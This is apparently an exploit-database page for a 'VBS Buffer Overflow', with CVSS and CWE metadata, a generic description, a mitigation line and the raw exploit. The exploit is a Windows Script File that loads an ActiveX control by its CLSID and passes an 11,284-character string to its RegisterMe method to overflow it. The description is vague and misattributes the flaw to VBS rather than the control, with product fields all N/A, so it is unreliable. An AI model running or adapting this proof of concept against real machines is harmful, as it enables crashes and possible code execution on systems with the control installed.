header-logo
Suggest Exploit
vendor:
N/A
by:
Anonymous
7.5
CVSS
HIGH
Buffer Overflow
119
CWE
Product Name: N/A
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: VBS
2020

VBS Buffer Overflow

This exploit is a VBS Buffer Overflow vulnerability. It is caused by a lack of boundary checks when handling user-supplied input. This allows an attacker to overwrite the memory of the application, potentially leading to code execution. This vulnerability affects applications that use VBS and do not properly validate user-supplied input.

Mitigation:

The best way to mitigate this vulnerability is to ensure that user-supplied input is properly validated and sanitized.
Source

Exploit-DB raw data:

<?XML version='1.0' standalone='yes' ?>

<package><job id='DoneInVBS' debug='false' error='true'>

<object classid='clsid:58916BE6-BAFF-4F33-AEFE-B2AA03FE4C86' id='target' />

<script language='vbscript'>


arg1=String(11284, "A")

target.RegisterMe arg1

</script>

</job>

</package>